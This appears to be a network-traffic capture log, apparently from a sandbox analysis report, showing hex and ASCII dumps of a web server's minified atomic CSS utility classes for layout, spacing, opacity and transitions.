                                                                                                                                                                        2023-06-02 11:13:21 UTC53INData Raw: 23 61 74 6f 6d 69 63 20 2e 48 5c 28 31 70 78 5c 29 7b 68 65 69 67 68 74 3a 31 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 32 30 70 78 5c 29 7b 68 65 69 67 68 74 3a 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 32 31 70 78 5c 29 7b 68 65 69 67 68 74 3a 32 31 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 32 32 70 78 5c 29 7b 68 65 69 67 68 74 3a 32 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 32 35 70 78 5c 29 7b 68 65 69 67 68 74 3a 32 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 33 5c 2e 33 65 6d 5c 29 7b 68 65 69 67 68 74 3a 33 2e 33 65 6d 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 33 30 5c 25 5c 29 7b 68 65 69 67 68 74 3a 33 30 25 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 33 31 70 78 5c 29 7b 68 65 69 67 68 74 3a 33 31 70 78 7d 23 61 74 6f 6d 69 63
                                                                                                                                                                        Data Ascii: #atomic .H\(1px\){height:1px}#atomic .H\(20px\){height:20px}#atomic .H\(21px\){height:21px}#atomic .H\(22px\){height:22px}#atomic .H\(25px\){height:25px}#atomic .H\(3\.3em\){height:3.3em}#atomic .H\(30\%\){height:30%}#atomic .H\(31px\){height:31px}#atomic
                                                                                                                                                                        2023-06-02 11:13:21 UTC54INData Raw: 4c 74 73 5c 28 5c 24 6c 73 70 61 63 69 6e 67 2d 73 6d 5c 29 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 7d 23 61 74 6f 6d 69 63 20 2e 4c 74 73 5c 28 30 5c 2e 35 70 78 5c 29 7b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 2e 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4c 69 73 74 5c 28 6e 5c 29 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 6e 6f 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 4c 68 5c 28 5c 24 6c 68 65 69 67 68 74 5c 29 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 33 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4c 68 5c 28 31 5c 2e 31 32 35 72 65 6d 5c 29 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 7d 23 61 74 6f 6d 69 63 20 2e 4c 68 5c 28 31 5c 2e 31 65 6d 5c 29 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 65 6d 7d 23
                                                                                                                                                                        Data Ascii: Lts\(\$lspacing-sm\){letter-spacing:normal}#atomic .Lts\(0\.5px\){letter-spacing:.5px}#atomic .List\(n\){list-style-type:none}#atomic .Lh\(\$lheight\){line-height:23px}#atomic .Lh\(1\.125rem\){line-height:1.125rem}#atomic .Lh\(1\.1em\){line-height:1.1em}#
                                                                                                                                                                        2023-06-02 11:13:21 UTC55INData Raw: 74 6f 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 2d 32 30 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 4d 78 5c 28 2d 32 30 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 65 6e 64 5c 28 2d 32 30 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 4d 78 5c 28 2d 32 30 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 78 5c 28 2d 35 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 65 6e 64 5c 28 2d 35 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 4d 78 5c 28 2d 35 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 30 5c 29 2c 23 61 74 6f 6d 69 63
                                                                                                                                                                        Data Ascii: to}#atomic .Mstart\(-20px\),#atomic .Mx\(-20px\){margin-left:-20px}#atomic .Mend\(-20px\),#atomic .Mx\(-20px\){margin-right:-20px}#atomic .Mx\(-5px\){margin-left:-5px}#atomic .Mend\(-5px\),#atomic .Mx\(-5px\){margin-right:-5px}#atomic .Mstart\(0\),#atomic
                                                                                                                                                                        2023-06-02 11:13:21 UTC56INData Raw: 74 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 61 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 4d 78 5c 28 61 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 7d 23 61 74 6f 6d 69 63 20 2e 4d 78 5c 28 61 5c 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 76 69 64 65 6f 2d 65 6e 64 63 61 72 64 20 2e 76 69 64 65 6f 2d 65 6e 64 63 61 72 64 5f 4d 78 5c 28 61 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 4d 74 5c 28 30 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 4d 79 5c 28 30 5c 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 4d 62 5c 28 30 5c 29 2c 23 61
                                                                                                                                                                        Data Ascii: t:8px}#atomic .Mstart\(a\),#atomic .Mx\(a\){margin-left:auto}#atomic .Mx\(a\){margin-right:auto}.video-endcard .video-endcard_Mx\(a\){margin-left:auto!important;margin-right:auto!important}#atomic .Mt\(0\),#atomic .My\(0\){margin-top:0}#atomic .Mb\(0\),#a
                                                                                                                                                                        2023-06-02 11:13:21 UTC58INData Raw: 75 74 20 2e 67 72 69 64 2d 6c 61 79 6f 75 74 5f 4d 74 5c 28 31 35 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 4d 74 5c 28 2d 31 33 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 33 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 74 5c 28 2d 31 34 35 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 34 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 74 5c 28 2d 31 35 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 74 5c 28 2d 31 38 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 74 5c 28 2d 31 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 74 5c
                                                                                                                                                                        Data Ascii: ut .grid-layout_Mt\(15px\){margin-top:15px!important}#atomic .Mt\(-13px\){margin-top:-13px}#atomic .Mt\(-145px\){margin-top:-145px}#atomic .Mt\(-15px\){margin-top:-15px}#atomic .Mt\(-18px\){margin-top:-18px}#atomic .Mt\(-1px\){margin-top:-1px}#atomic .Mt\
                                                                                                                                                                        2023-06-02 11:13:21 UTC59INData Raw: 74 6f 6d 69 63 20 2e 4d 65 6e 64 5c 28 2d 32 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 65 6e 64 5c 28 2d 33 30 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 33 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 65 6e 64 5c 28 2d 34 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 65 6e 64 5c 28 2d 35 30 76 77 5c 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 35 30 76 77 7d 23 61 74 6f 6d 69 63 20 2e 4d 65 6e 64 5c 28 2d 38 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 65 6e 64 5c 28 31 30 5c 25 5c 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 25 7d 23 61 74 6f 6d 69 63 20 2e 4d 65 6e 64 5c
                                                                                                                                                                        Data Ascii: tomic .Mend\(-2px\){margin-right:-2px}#atomic .Mend\(-30px\){margin-right:-30px}#atomic .Mend\(-4px\){margin-right:-4px}#atomic .Mend\(-50vw\){margin-right:-50vw}#atomic .Mend\(-8px\){margin-right:-8px}#atomic .Mend\(10\%\){margin-right:10%}#atomic .Mend\
                                                                                                                                                                        2023-06-02 11:13:21 UTC60INData Raw: 62 65 66 6f 72 65 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 2d 32 31 35 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 31 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 2d 32 33 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 33 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 2d 33 30 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 33 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 2d 33 35 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 33 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 73 74 61 72 74 5c 28 2d 33 35 70 78 5c 29 5c 21 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 33 35 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23
                                                                                                                                                                        Data Ascii: before{margin-left:-14px}#atomic .Mstart\(-215px\){margin-left:-215px}#atomic .Mstart\(-23px\){margin-left:-23px}#atomic .Mstart\(-30px\){margin-left:-30px}#atomic .Mstart\(-35px\){margin-left:-35px}#atomic .Mstart\(-35px\)\!{margin-left:-35px!important}#
                                                                                                                                                                        2023-06-02 11:13:21 UTC62INData Raw: 74 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 77 5c 28 32 30 30 70 78 5c 29 7b 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 77 5c 28 32 31 34 70 78 5c 29 7b 6d 61 78 2d 77 69 64 74 68 3a 32 31 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 77 5c 28 32 32 30 70 78 5c 29 7b 6d 61 78 2d 77 69 64 74 68 3a 32 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 77 5c 28 32 36 38 70 78 5c 29 7b 6d 61 78 2d 77 69 64 74 68 3a 32 36 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 77 5c 28 32 38 38 70 78 5c 29 7b 6d 61 78 2d 77 69 64 74 68 3a 32 38 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 77 5c 28 32 39 30 70 78 5c 29 7b 6d 61 78 2d 77 69 64 74 68 3a 32 39 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 77 5c 28 33 30 30 70 78 5c 29 7b 6d 61 78
                                                                                                                                                                        Data Ascii: t}#atomic .Maw\(200px\){max-width:200px}#atomic .Maw\(214px\){max-width:214px}#atomic .Maw\(220px\){max-width:220px}#atomic .Maw\(268px\){max-width:268px}#atomic .Maw\(288px\){max-width:288px}#atomic .Maw\(290px\){max-width:290px}#atomic .Maw\(300px\){max
                                                                                                                                                                        2023-06-02 11:13:21 UTC63INData Raw: 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 30 7d 2e 76 69 64 65 6f 2d 65 6e 64 63 61 72 64 20 2e 76 69 64 65 6f 2d 65 6e 64 63 61 72 64 5f 4f 5c 28 6e 5c 29 7b 6f 75 74 6c 69 6e 65 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 6d 61 72 74 70 68 6f 6e 65 20 2e 73 6d 61 72 74 70 68 6f 6e 65 5f 54 5c 28 30 5c 29 7b 74 6f 70 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 6d 61 72 74 70 68 6f 6e 65 20 2e 73 6d 61 72 74 70 68 6f 6e 65 5f 54 5c 28 61 5c 29 2c 2e 74 61 62 6c 65 74 20 2e 74 61 62 6c 65 74 5f 54 5c 28 61 5c 29 7b 74 6f 70 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 2d 31 30 70 78 5c 29 7b 74 6f 70 3a 2d 31 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 2d 31 31 70 78 5c 29 7b 74 6f 70 3a 2d 31 31 70 78 7d 23 61 74
                                                                                                                                                                        Data Ascii: ocus{outline:0}.video-endcard .video-endcard_O\(n\){outline:0!important}.smartphone .smartphone_T\(0\){top:0!important}.smartphone .smartphone_T\(a\),.tablet .tablet_T\(a\){top:auto!important}#atomic .T\(-10px\){top:-10px}#atomic .T\(-11px\){top:-11px}#at
                                                                                                                                                                        2023-06-02 11:13:21 UTC64INData Raw: 61 72 64 5f 54 5c 28 33 30 70 78 5c 29 7b 74 6f 70 3a 33 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 45 6e 64 5c 28 2d 34 70 78 5c 29 7b 72 69 67 68 74 3a 2d 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 45 6e 64 5c 28 2d 35 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 45 6e 64 5c 28 2d 35 70 78 5c 29 5c 3a 5c 3a 61 3a 61 66 74 65 72 7b 72 69 67 68 74 3a 2d 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 45 6e 64 5c 28 2d 38 70 78 5c 29 7b 72 69 67 68 74 3a 2d 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 45 6e 64 5c 28 30 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 45 6e 64 5c 28 30 70 78 5c 29 7b 72 69 67 68 74 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 45 6e 64 5c 28 31 30 70 78 5c 29 7b 72 69 67 68 74 3a 31 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 45 6e 64 5c 28 31 32
                                                                                                                                                                        Data Ascii: ard_T\(30px\){top:30px!important}#atomic .End\(-4px\){right:-4px}#atomic .End\(-5px\),#atomic .End\(-5px\)\:\:a:after{right:-5px}#atomic .End\(-8px\){right:-8px}#atomic .End\(0\),#atomic .End\(0px\){right:0}#atomic .End\(10px\){right:10px}#atomic .End\(12
                                                                                                                                                                        2023-06-02 11:13:21 UTC65INData Raw: 29 7b 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 53 74 61 72 74 5c 28 2d 31 30 30 76 77 5c 29 7b 6c 65 66 74 3a 2d 31 30 30 76 77 7d 23 61 74 6f 6d 69 63 20 2e 53 74 61 72 74 5c 28 2d 31 31 70 78 5c 29 7b 6c 65 66 74 3a 2d 31 31 70 78 7d 23 61 74 6f 6d 69 63 20 2e 53 74 61 72 74 5c 28 2d 32 33 30 70 78 5c 29 7b 6c 65 66 74 3a 2d 32 33 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 53 74 61 72 74 5c 28 2d 35 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 53 74 61 72 74 5c 28 2d 35 70 78 5c 29 5c 3a 5c 3a 62 3a 62 65 66 6f 72 65 7b 6c 65 66 74 3a 2d 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 53 74 61 72 74 5c 28 30 70 78 5c 29 7b 6c 65 66 74 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 53 74 61 72 74 5c 28 31 30 70 78 5c 29 7b 6c 65 66 74 3a 31 30
                                                                                                                                                                        Data Ascii: ){left:0!important}#atomic .Start\(-100vw\){left:-100vw}#atomic .Start\(-11px\){left:-11px}#atomic .Start\(-230px\){left:-230px}#atomic .Start\(-5px\),#atomic .Start\(-5px\)\:\:b:before{left:-5px}#atomic .Start\(0px\){left:0}#atomic .Start\(10px\){left:10
                                                                                                                                                                        2023-06-02 11:13:21 UTC67INData Raw: 2e 4f 70 5c 28 30 5c 2e 34 5c 29 7b 6f 70 61 63 69 74 79 3a 2e 34 7d 23 61 74 6f 6d 69 63 20 2e 4f 70 5c 28 30 5c 2e 35 5c 29 7b 6f 70 61 63 69 74 79 3a 2e 35 7d 23 61 74 6f 6d 69 63 20 2e 4f 70 5c 28 30 5c 2e 36 5c 29 7b 6f 70 61 63 69 74 79 3a 2e 36 7d 23 61 74 6f 6d 69 63 20 2e 4f 70 5c 28 30 5c 2e 38 5c 29 7b 6f 70 61 63 69 74 79 3a 2e 38 7d 23 61 74 6f 6d 69 63 20 2e 4f 70 5c 28 31 5c 29 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 76 69 64 65 6f 2d 65 6e 64 63 61 72 64 20 2e 76 69 64 65 6f 2d 65 6e 64 63 61 72 64 5f 4f 70 5c 28 30 5c 2e 32 5c 29 7b 6f 70 61 63 69 74 79 3a 2e 32 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 4f 76 5c 28 61 5c 29 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 2e 48 69 64 64 65 6e 2c 5b 63 6c 61 73 73 2a 3d 4c 69 6e
                                                                                                                                                                        Data Ascii: .Op\(0\.4\){opacity:.4}#atomic .Op\(0\.5\){opacity:.5}#atomic .Op\(0\.6\){opacity:.6}#atomic .Op\(0\.8\){opacity:.8}#atomic .Op\(1\){opacity:1}.video-endcard .video-endcard_Op\(0\.2\){opacity:.2!important}#atomic .Ov\(a\){overflow:auto}.Hidden,[class*=Lin
                                                                                                                                                                        2023-06-02 11:13:21 UTC68INData Raw: 20 2e 50 78 5c 28 31 38 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 73 74 61 72 74 5c 28 32 30 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 32 30 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 65 6e 64 5c 28 32 30 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 32 30 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 73 74 61 72 74 5c 28 32 32 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 32 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 32 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 32 70 78
                                                                                                                                                                        Data Ascii: .Px\(18px\){padding-right:18px}#atomic .Pstart\(20px\),#atomic .Px\(20px\){padding-left:20px}#atomic .Pend\(20px\),#atomic .Px\(20px\){padding-right:20px}#atomic .Pstart\(22px\),#atomic .Px\(22px\){padding-left:22px}#atomic .Px\(22px\){padding-right:22px
                                                                                                                                                                        2023-06-02 11:13:21 UTC69INData Raw: 30 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 30 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 31 30 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 74 5c 28 31 32 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 31 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 62 5c 28 31 32 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 31 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 74 5c 28 31 35 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 31 35 70 78 5c 29
                                                                                                                                                                        Data Ascii: 0px\),#atomic .Py\(0px\){padding-bottom:0}#atomic .Py\(10px\){padding-top:10px;padding-bottom:10px}#atomic .Pt\(12px\),#atomic .Py\(12px\){padding-top:12px}#atomic .Pb\(12px\),#atomic .Py\(12px\){padding-bottom:12px}#atomic .Pt\(15px\),#atomic .Py\(15px\)
                                                                                                                                                                        2023-06-02 11:13:21 UTC69INData Raw: 3a 31 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 62 5c 28 31 35 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 31 35 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 32 30 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 30 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 32 34 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 34 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 74 5c 28 32 70 78 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 79 5c 28 32 70 78 5c 29 7b 70 61
                                                                                                                                                                        Data Ascii: :15px}#atomic .Pb\(15px\),#atomic .Py\(15px\){padding-bottom:15px}#atomic .Py\(20px\){padding-top:20px;padding-bottom:20px}#atomic .Py\(24px\){padding-bottom:24px;padding-top:24px}#atomic .Pt\(2px\),#atomic .Py\(2px\){padding-top:2px}#atomic .Py\(2px\){pa
                                                                                                                                                                        2023-06-02 11:13:21 UTC71INData Raw: 6d 69 63 20 2e 50 65 6e 64 5c 28 35 30 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 65 6e 64 5c 28 35 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 65 6e 64 5c 28 39 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 62 5c 28 31 34 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 62 5c 28 31 36 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 36 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 62 5c 28 32 35 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 62 5c 28 35 32 5c 25 5c 29 7b
                                                                                                                                                                        Data Ascii: mic .Pend\(50px\){padding-right:50px}#atomic .Pend\(5px\){padding-right:5px}#atomic .Pend\(9px\){padding-right:9px}#atomic .Pb\(14px\){padding-bottom:14px}#atomic .Pb\(16px\){padding-bottom:16px}#atomic .Pb\(25px\){padding-bottom:25px}#atomic .Pb\(52\%\){
                                                                                                                                                                        2023-06-02 11:13:21 UTC72INData Raw: 78 74 2d 61 6c 69 67 6e 3a 31 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 61 5c 28 73 5c 29 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 73 74 61 72 74 7d 2e 76 69 64 65 6f 2d 65 6e 64 63 61 72 64 20 2e 76 69 64 65 6f 2d 65 6e 64 63 61 72 64 5f 54 61 5c 28 63 5c 29 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 74 72 65 61 6d 2d 69 74 65 6d 2d 6d 79 3a 68 6f 76 65 72 20 2e 73 74 72 65 61 6d 2d 69 74 65 6d 2d 6d 79 5c 3a 68 5f 54 64 5c 28 75 5c 29 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 54 64 5c 28 6e 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 54 64 5c 28 6e 5c 29 5c 3a 66 3a 66 6f 63 75 73 2c 23 61 74 6f 6d 69 63 20 2e 54 64 5c 28
                                                                                                                                                                        Data Ascii: xt-align:15px}#atomic .Ta\(s\){text-align:start}.video-endcard .video-endcard_Ta\(c\){text-align:center!important}.stream-item-my:hover .stream-item-my\:h_Td\(u\){text-decoration:underline!important}#atomic .Td\(n\),#atomic .Td\(n\)\:f:focus,#atomic .Td\(
                                                                                                                                                                        2023-06-02 11:13:21 UTC73INData Raw: 2e 61 63 74 69 76 65 5f 54 72 61 6e 73 6c 61 74 65 58 5c 28 2d 32 36 30 70 78 5c 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 32 36 30 70 78 29 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 63 74 69 76 65 20 2e 61 63 74 69 76 65 5f 54 72 61 6e 73 6c 61 74 65 58 5c 28 32 31 35 70 78 5c 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 31 35 70 78 29 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 63 74 69 76 65 20 2e 61 63 74 69 76 65 5f 54 72 61 6e 73 6c 61 74 65 58 5c 28 32 36 30 70 78 5c 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 30 70 78 29 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 54 72 61 6e 73 6c 61 74 65 58 5c 28 2d 31 30 30 5c 25 5c 29 7b 74 72 61 6e 73 66 6f 72 6d
                                                                                                                                                                        Data Ascii: .active_TranslateX\(-260px\){transform:translateX(-260px)!important}.active .active_TranslateX\(215px\){transform:translateX(215px)!important}.active .active_TranslateX\(260px\){transform:translateX(260px)!important}#atomic .TranslateX\(-100\%\){transform
                                                                                                                                                                        2023-06-02 11:13:21 UTC74INData Raw: 5c 29 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 37 73 7d 23 61 74 6f 6d 69 63 20 2e 54 72 73 64 75 5c 28 30 5c 2e 39 73 5c 29 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 39 73 7d 23 61 74 6f 6d 69 63 20 2e 54 72 73 64 75 5c 28 30 73 5c 29 5c 21 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 30 73 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 54 72 73 70 5c 28 5c 24 74 72 61 6e 73 66 6f 72 6d 5c 29 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 74 72 61 6e 73 66 6f 72 6d 7d 23 61 74 6f 6d 69 63 20 2e 54 72 73 70 5c 28 61 5c 29 7b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 61 6c 6c 7d 23 61 74 6f 6d 69 63 20 2e 54 72 73 70 5c 28 6d 61 78 2d 68 65 69
